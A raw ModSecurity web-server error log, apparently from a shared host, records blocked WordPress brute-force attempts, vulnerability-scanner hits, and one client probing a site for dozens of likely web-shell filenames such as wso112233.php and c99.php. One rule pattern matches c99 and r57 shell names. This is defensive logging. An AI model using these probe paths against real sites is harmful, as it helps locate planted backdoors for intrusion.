[Tue May 26 13:49:58.156202 2026] [security2:error] [pid 560287:tid 560304] [remote 74.7.242.7:52076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.242.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "algosoftware.bloggertarget.com"] [uri "/wp-content/plugins/pagelayer/css/givecss.php"] [unique_id "ahVXrpmX5s6sDS3wJVcQ1wAAjBA"], referer: https://algosoftware.bloggertarget.com/
[Tue May 26 13:49:58.341884 2026] [security2:error] [pid 555743:tid 555882] [client 15.235.169.50:55128] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/content.php"] [unique_id "ahVXrsjqAquC0YaxQjCy9AAAARM"]
[Tue May 26 13:49:58.814544 2026] [security2:error] [pid 560287:tid 560476] [client 15.235.169.50:55212] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/woh.php"] [unique_id "ahVXrpmX5s6sDS3wJVcQ2wAAALw"]
[Tue May 26 13:49:59.040233 2026] [security2:error] [pid 555743:tid 555946] [client 129.222.147.134:28335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXr8jqAquC0YaxQjCzAQAAAVM"]
[Tue May 26 13:49:59.044031 2026] [security2:error] [pid 555743:tid 555946] [client 129.222.147.134:28335] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXr8jqAquC0YaxQjCzAQAAAVM"]
[Tue May 26 13:49:59.305310 2026] [security2:error] [pid 555743:tid 555878] [client 15.235.169.50:55273] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/press/wp-class.php"] [unique_id "ahVXr8jqAquC0YaxQjCzBwAAAQ8"]
[Tue May 26 13:49:59.767889 2026] [security2:error] [pid 555743:tid 555958] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXr8jqAquC0YaxQjCzCAAAAV8"]
[Tue May 26 13:49:59.888426 2026] [security2:error] [pid 560287:tid 560474] [client 15.235.169.50:55353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/plugins.php"] [unique_id "ahVXr5mX5s6sDS3wJVcQ8gAAALo"]
[Tue May 26 13:50:00.048235 2026] [security2:error] [pid 560287:tid 560315] [remote 74.7.241.58:52258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVXsJmX5s6sDS3wJVcQ9QAArxs"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common
[Tue May 26 13:50:00.304577 2026] [security2:error] [pid 560287:tid 560459] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXr5mX5s6sDS3wJVcQ8wAAAKw"]
[Tue May 26 13:50:00.410596 2026] [security2:error] [pid 555743:tid 555982] [client 15.235.169.50:55429] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wsoyanz.php"] [unique_id "ahVXsMjqAquC0YaxQjCzGAAAAXc"]
[Tue May 26 13:50:00.895318 2026] [security2:error] [pid 560287:tid 560467] [client 15.235.169.50:55507] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/"] [unique_id "ahVXsJmX5s6sDS3wJVcRAAAAALQ"]
[Tue May 26 13:50:01.386094 2026] [security2:error] [pid 560287:tid 560518] [client 15.235.169.50:55575] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/shell.php"] [unique_id "ahVXsZmX5s6sDS3wJVcRCQAAAOQ"]
[Tue May 26 13:50:01.872345 2026] [security2:error] [pid 560287:tid 560445] [client 15.235.169.50:55652] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php"] [unique_id "ahVXsZmX5s6sDS3wJVcREgAAAJ8"]
[Tue May 26 13:50:02.263088 2026] [security2:error] [pid 560287:tid 560447] [client 103.235.0.172:49864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.0.235.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/xmlrpc.php"] [unique_id "ahVXspmX5s6sDS3wJVcRFwAAAKE"]
[Tue May 26 13:50:02.263253 2026] [security2:error] [pid 560287:tid 560447] [client 103.235.0.172:49864] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "koneksi.com.co"] [uri "/xmlrpc.php"] [unique_id "ahVXspmX5s6sDS3wJVcRFwAAAKE"]
[Tue May 26 13:50:02.335972 2026] [security2:error] [pid 560287:tid 560538] [client 98.18.193.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXsZmX5s6sDS3wJVcREQAAAPY"]
[Tue May 26 13:50:02.348337 2026] [security2:error] [pid 555743:tid 555876] [client 15.235.169.50:55702] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/epinyins.php"] [unique_id "ahVXssjqAquC0YaxQjCzMAAAAQ0"]
[Tue May 26 13:50:02.739425 2026] [security2:error] [pid 555743:tid 555936] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXssjqAquC0YaxQjCzLwAAAUk"]
[Tue May 26 13:50:02.843868 2026] [security2:error] [pid 560287:tid 560438] [client 15.235.169.50:55775] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/cgi-bin/admin.php"] [unique_id "ahVXspmX5s6sDS3wJVcRKwAAAJk"]
[Tue May 26 13:50:03.013366 2026] [security2:error] [pid 560287:tid 560319] [remote 211.23.68.235:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVXspmX5s6sDS3wJVcRKgAA-B8"]
[Tue May 26 13:50:03.371948 2026] [security2:error] [pid 555743:tid 555978] [client 15.235.169.50:55833] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/w.php"] [unique_id "ahVXs8jqAquC0YaxQjCzOQAAAXM"]
[Tue May 26 13:50:03.867856 2026] [security2:error] [pid 560287:tid 560491] [client 15.235.169.50:55897] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/pridmag/mar.php"] [unique_id "ahVXs5mX5s6sDS3wJVcROwAAAMo"]
[Tue May 26 13:50:04.002837 2026] [security2:error] [pid 560287:tid 560514] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXs5mX5s6sDS3wJVcROQAAAOA"]
[Tue May 26 13:50:04.364119 2026] [security2:error] [pid 555743:tid 556000] [client 15.235.169.50:56005] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/uploader.php"] [unique_id "ahVXtMjqAquC0YaxQjCzQgAAAYk"]
[Tue May 26 13:50:04.860858 2026] [security2:error] [pid 560287:tid 560480] [client 15.235.169.50:56093] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/Xl2023.php"] [unique_id "ahVXtJmX5s6sDS3wJVcRUAAAAL8"]
[Tue May 26 13:50:05.337215 2026] [security2:error] [pid 560287:tid 560484] [client 15.235.169.50:56200] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/c.php"] [unique_id "ahVXtZmX5s6sDS3wJVcRUwAAAMM"]
[Tue May 26 13:50:05.854917 2026] [security2:error] [pid 560287:tid 560545] [client 15.235.169.50:56298] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/access.php"] [unique_id "ahVXtZmX5s6sDS3wJVcRXAAAAP0"]
[Tue May 26 13:50:06.355913 2026] [security2:error] [pid 555743:tid 555900] [client 15.235.169.50:56405] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/sclass_api.php"] [unique_id "ahVXtsjqAquC0YaxQjCzaAAAASU"]
[Tue May 26 13:50:06.388820 2026] [security2:error] [pid 555743:tid 555927] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXtcjqAquC0YaxQjCzVQAAAUA"]
[Tue May 26 13:50:06.822678 2026] [security2:error] [pid 555743:tid 555985] [client 15.235.169.50:56505] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/core/include.php"] [unique_id "ahVXtsjqAquC0YaxQjCzcgAAAXo"]
[Tue May 26 13:50:07.373447 2026] [security2:error] [pid 560287:tid 560459] [client 15.235.169.50:56586] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/1.php"] [unique_id "ahVXt5mX5s6sDS3wJVcRZAAAAKw"]
[Tue May 26 13:50:07.868614 2026] [security2:error] [pid 560287:tid 560516] [client 15.235.169.50:56731] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/pekok.php"] [unique_id "ahVXt5mX5s6sDS3wJVcRcAAAAOI"]
[Tue May 26 13:50:08.025579 2026] [security2:error] [pid 555743:tid 555884] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXt8jqAquC0YaxQjCzfgAAARU"]
[Tue May 26 13:50:08.329410 2026] [security2:error] [pid 560287:tid 560518] [client 15.235.169.50:56830] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/api.php"] [unique_id "ahVXuJmX5s6sDS3wJVcRfAAAAOQ"]
[Tue May 26 13:50:08.631067 2026] [security2:error] [pid 560287:tid 560471] [client 106.192.248.115:64655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXuJmX5s6sDS3wJVcRhAAAALc"]
[Tue May 26 13:50:08.631195 2026] [security2:error] [pid 560287:tid 560471] [client 106.192.248.115:64655] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXuJmX5s6sDS3wJVcRhAAAALc"]
[Tue May 26 13:50:08.820205 2026] [security2:error] [pid 555743:tid 555879] [client 15.235.169.50:56936] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/upgrade.php"] [unique_id "ahVXuMjqAquC0YaxQjCzlAAAARA"]
[Tue May 26 13:50:09.254290 2026] [security2:error] [pid 555743:tid 555782] [remote 95.211.96.182:36882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.96.211.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVXucjqAquC0YaxQjCzmgABOiY"]
[Tue May 26 13:50:09.302539 2026] [security2:error] [pid 555743:tid 555919] [client 15.235.169.50:57051] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/chosen.php"] [unique_id "ahVXucjqAquC0YaxQjCznwAAATg"]
[Tue May 26 13:50:09.394152 2026] [security2:error] [pid 560287:tid 560499] [client 129.222.147.134:4298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXuZmX5s6sDS3wJVcRiwAAANI"]
[Tue May 26 13:50:09.394386 2026] [security2:error] [pid 560287:tid 560499] [client 129.222.147.134:4298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXuZmX5s6sDS3wJVcRiwAAANI"]
[Tue May 26 13:50:09.476848 2026] [security2:error] [pid 555743:tid 555972] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXucjqAquC0YaxQjCzmQAAAW0"]
[Tue May 26 13:50:09.800019 2026] [security2:error] [pid 560287:tid 560485] [client 15.235.169.50:57161] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVXuZmX5s6sDS3wJVcRmgAAAMQ"]
[Tue May 26 13:50:09.826585 2026] [security2:error] [pid 560287:tid 560341] [remote 170.187.230.30:40530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.230.187.170.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVXuZmX5s6sDS3wJVcRkwAA7DU"]
[Tue May 26 13:50:10.288399 2026] [security2:error] [pid 560287:tid 560535] [client 15.235.169.50:57278] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/repeater.php"] [unique_id "ahVXupmX5s6sDS3wJVcRpgAAAPU"]
[Tue May 26 13:50:10.358966 2026] [security2:error] [pid 560287:tid 560451] [client 150.107.5.176:41533] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVXupmX5s6sDS3wJVcRowAAAKU"]
[Tue May 26 13:50:10.828924 2026] [security2:error] [pid 560287:tid 560436] [client 15.235.169.50:57376] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/skins/lightgray/img/index.php"] [unique_id "ahVXupmX5s6sDS3wJVcRsgAAAJc"]
[Tue May 26 13:50:10.867263 2026] [security2:error] [pid 560287:tid 560472] [client 185.198.240.99:53967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.240.198.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "godrejpest.co.in"] [uri "/wp-login.php"] [unique_id "ahVXupmX5s6sDS3wJVcRqgAAALg"]
[Tue May 26 13:50:11.449687 2026] [security2:error] [pid 560287:tid 560478] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXu5mX5s6sDS3wJVcRtgAAAL4"]
[Tue May 26 13:50:11.653177 2026] [security2:error] [pid 555743:tid 555926] [client 15.235.169.50:57468] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-login.php"] [unique_id "ahVXu8jqAquC0YaxQjCzsgAAAT8"]
[Tue May 26 13:50:12.119058 2026] [security2:error] [pid 560287:tid 560426] [client 15.235.169.50:57616] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/wso112233.php"] [unique_id "ahVXvJmX5s6sDS3wJVcRzwAAAI0"]
[Tue May 26 13:50:12.628992 2026] [security2:error] [pid 560287:tid 560485] [client 15.235.169.50:57718] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/js.php"] [unique_id "ahVXvJmX5s6sDS3wJVcR3wAAAMQ"]
[Tue May 26 13:50:13.094278 2026] [security2:error] [pid 560287:tid 560440] [client 15.235.169.50:57813] ModSecurity: Access denied with connection close (phase 1). Pattern match "c99\\\\.php|r57shell\\\\.php|r57\\\\.php|c99\\\\.txt" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1164"] [id "900010"] [rev "1"] [msg "c99 variant "] [severity "CRITICAL"] [hostname "doyecpa.com"] [uri "/c99.php"] [unique_id "ahVXvZmX5s6sDS3wJVcSDwAAAJs"]
[Tue May 26 13:50:13.103271 2026] [security2:error] [pid 560287:tid 560520] [client 15.235.169.50:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVXvZmX5s6sDS3wJVcSEQAAAOY"]
[Tue May 26 13:50:13.244356 2026] [security2:error] [pid 560287:tid 560464] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXvJmX5s6sDS3wJVcR8AAAALE"]
[Tue May 26 13:50:13.570729 2026] [security2:error] [pid 560287:tid 560421] [client 15.235.169.50:57924] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/uploads/help.php"] [unique_id "ahVXvZmX5s6sDS3wJVcSFgAAAIg"]
[Tue May 26 13:50:14.057422 2026] [security2:error] [pid 555743:tid 555897] [client 15.235.169.50:58015] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/admin-post.php"] [unique_id "ahVXvsjqAquC0YaxQjCzzAAAASI"]
[Tue May 26 13:50:14.559462 2026] [security2:error] [pid 555743:tid 555994] [client 15.235.169.50:58111] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/data.php"] [unique_id "ahVXvsjqAquC0YaxQjCz1QAAAYM"]
[Tue May 26 13:50:14.971517 2026] [security2:error] [pid 555743:tid 555896] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXvsjqAquC0YaxQjCz1AAAASE"]
[Tue May 26 13:50:15.044188 2026] [security2:error] [pid 555743:tid 555972] [client 15.235.169.50:58239] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/rc.php"] [unique_id "ahVXv8jqAquC0YaxQjCz3AAAAW0"]
[Tue May 26 13:50:15.525379 2026] [security2:error] [pid 555743:tid 555937] [client 15.235.169.50:58342] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-apxupx.php"] [unique_id "ahVXv8jqAquC0YaxQjCz4wAAAUo"]
[Tue May 26 13:50:15.990406 2026] [security2:error] [pid 555743:tid 555874] [client 15.235.169.50:58426] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/index.php"] [unique_id "ahVXv8jqAquC0YaxQjCz5wAAAQs"]
[Tue May 26 13:50:16.470478 2026] [security2:error] [pid 555743:tid 555992] [client 15.235.169.50:58529] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVXwMjqAquC0YaxQjCz8gAAAYE"]
[Tue May 26 13:50:16.936123 2026] [security2:error] [pid 560287:tid 560549] [client 15.235.169.50:58624] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/index.php"] [unique_id "ahVXwJmX5s6sDS3wJVcSRgAAAQE"]
[Tue May 26 13:50:17.044738 2026] [security2:error] [pid 560287:tid 560513] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXwJmX5s6sDS3wJVcSQAAAAN8"]
